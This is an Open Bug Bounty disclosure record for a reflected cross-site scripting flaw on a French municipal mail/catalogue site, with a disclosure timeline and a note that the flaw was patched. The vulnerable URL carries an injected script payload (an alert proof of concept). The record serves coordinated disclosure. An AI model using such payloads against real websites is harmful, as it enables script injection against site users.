mail.contamine-sur-arve.fr XSS vulnerability

2016-06-28T10:31:00
ID OBB:162463
Type openbugbounty
Reporter XSSbot
Modified 2016-08-03T19:30:00

Description

Vulnerable URL:
http://mail.contamine-sur-arve.fr/dk_opac15/search/list?=%5B%27%27%5D&dk;_annexe%5B2%5D=%5B%278%27%5D&dk;_annexe%5B3%5D=%5B%275%27%5D&database;=%5B%27IBDON%27%5D&dk;_annexe%5B4%5D=%5B%271%27%5D&Keys2;=%5B%27%27%5D&Use3;=%5B%279993%27%5D&dk;_annexe%5B1%5D=%5B%273%27%5D&Restrict;_Exist10=%5B%27T%27%5D&Data1;=%5B%27%27%5D&dk;_annexe%5B0%5D=%5B%272%27%5D&advanced;=%5B%27%27%5D&Use2;=%5B%271034%27%5D%27%3Cscript%3Ealert(%27OPENBUGBOUNTY%27);%3C/script%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check mail.contamine-sur-arve.fr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 28 June, 2016 10:31 GMT
Generic security notifications sent to website owner| 28 June, 2016 10:34 GMT
Vulnerability details disclosed by researcher| 5 July, 2016 11:11 GMT
Vulnerability patched by the website owner| 3 August, 2016 19:30 GMT